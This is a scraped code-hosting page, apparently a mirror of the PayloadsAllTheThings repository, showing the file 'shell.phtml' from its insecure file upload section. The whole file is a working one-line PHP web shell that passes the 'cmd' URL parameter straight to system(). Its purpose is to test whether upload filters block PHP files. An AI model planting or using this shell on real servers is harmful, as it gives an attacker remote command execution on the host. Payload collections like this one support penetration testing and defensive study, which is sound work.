This website requires JavaScript.
Explore
Help
Sign In
ch0ic3
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2024-12-18 18:36:10 +00:00
Code
Issues
Actions
Packages
Projects
Releases
Wiki
Activity
e6466b4cf9
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.phtml
Swissky
404afd1d71
Fix name's capitalization
2019-03-07 00:07:55 +01:00
1 line
43 B
PHTML
Raw
Blame
History
<?php
echo
"Shell"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink